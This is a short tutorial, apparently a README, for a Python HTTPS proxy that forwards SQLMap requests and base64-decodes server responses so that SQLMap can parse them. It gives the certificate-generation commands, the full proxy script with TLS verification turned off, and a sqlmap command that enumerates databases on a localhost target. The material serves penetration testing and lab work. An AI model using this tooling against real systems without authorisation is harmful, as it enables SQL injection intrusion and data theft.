SqlMap-based64 DecodeProxy
A GET proxy for SQLMap and also decodes the base64 response.
By Dmichos
Step 1: Create a Folder for SqlMapProxy
First, create a dedicated folder where you will store the generated certificates and the proxy file for SqlMapProxy. This will help keep everything organized and easily accessible.
# Create a folder for SqlMapProxy and navigate to it
mkdir sqlproxy
cd sqlproxy
# Generate the SSL certificate
openssl genpkey -algorithm RSA -out private_key.pem
openssl req -new -key private_key.pem -out cert_request.csr
openssl x509 -req -in cert_request.csr -signkey private_key.pem -out cert.pem -days 365
Step 2: Set Up the Proxy Script
Now, we need to create the proxy script that will intercept and decode the requests and responses. This script will work with SQLMap to perform SQL injection testing with an added layer of decoding.
import base64
import http.server
import socketserver
import ssl
import requests
from urllib.parse import urlparse
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
PORT = 8080 # you can change this port
CERT_FILE = "cert.pem"
KEY_FILE = "private_key.pem"
class ProxyHandler(http.server.BaseHTTPRequestHandler):
def do_REQUEST(self):
self.handle_request()
def do_GET(self):
self.handle_request()
def do_POST(self):
self.handle_request()
def handle_request(self):
request_headers = self.headers
request_method = self.command
request_path = self.path
content_length = int(request_headers.get('Content-Length', 0))
body = self.rfile.read(content_length) if content_length else b""
target_url = self.construct_target_url(request_headers)
try:
response = requests.request(
request_method,
target_url,
headers=dict(request_headers),
data=body,
allow_redirects=False,
verify=False
)
decoded_content = response.text
try:
if len(decoded_content) % 4 == 0 and all(c in "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" for c in decoded_content.strip()):
decoded_content = base64.b64decode(decoded_content).decode('utf-8')
except Exception as e:
pass
self.send_response(response.status_code)
for key, value in response.headers.items():
self.send_header(key, value)
self.end_headers()
self.wfile.write(decoded_content.encode())
except requests.exceptions.SSLError as ssl_error:
self.send_response(500)
self.end_headers()
self.wfile.write(b"SSL Error")
def construct_target_url(self, headers):
host = headers.get('Host')
if not host:
raise ValueError("Host header is missing in the request.")
scheme = "https"
target_url = f"{scheme}://{host}{self.path}"
return target_url
def run_proxy():
with socketserver.TCPServer(("", PORT), ProxyHandler) as httpd:
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()
if __name__ == "__main__":
run_proxy()
Step 3: Start the Proxy Server
Once the folder and proxy script are set up, you can now start the proxy server. This server will listen for incoming requests, forward them to the target URL, and then return the decoded response.
Start the Proxy Server
To start the proxy server, run the following command in the terminal:
# Run the proxy server
python3 proxy.py
# Run Sqlmap
sqlmap -u "http://localhost:1337/?id=1" --dbs --batch --random-agent --proxy="https://localhost:8080" --force-ssl
The server will now listen on the specified port (default is 8080). You can configure SQLMap or any other tool to route traffic through this proxy for testing and decoding purposes.
Sqlmap will capture the decoded Based64 !